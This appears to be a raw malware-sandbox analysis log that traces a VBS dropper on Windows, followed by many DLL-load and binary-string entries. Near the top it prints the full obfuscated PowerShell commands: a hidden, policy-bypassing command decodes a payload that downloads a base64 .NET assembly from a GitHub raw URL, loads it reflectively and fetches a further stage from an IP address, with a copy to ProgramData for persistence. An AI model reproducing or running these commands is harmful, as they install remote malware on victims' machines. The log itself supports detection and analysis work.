Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\autopatia.vbs"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\autopatia.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Automated click: OK
Source: C:\Windows\System32\wscript.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb[ source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000003.00000002.2211606771.00007FFD9BC50000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbpdb` source: powershell.exe, 00000003.00000002.2202319158.0000022A9B4E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B82B000.00000004.00000020.00020000.00000000.sdmp
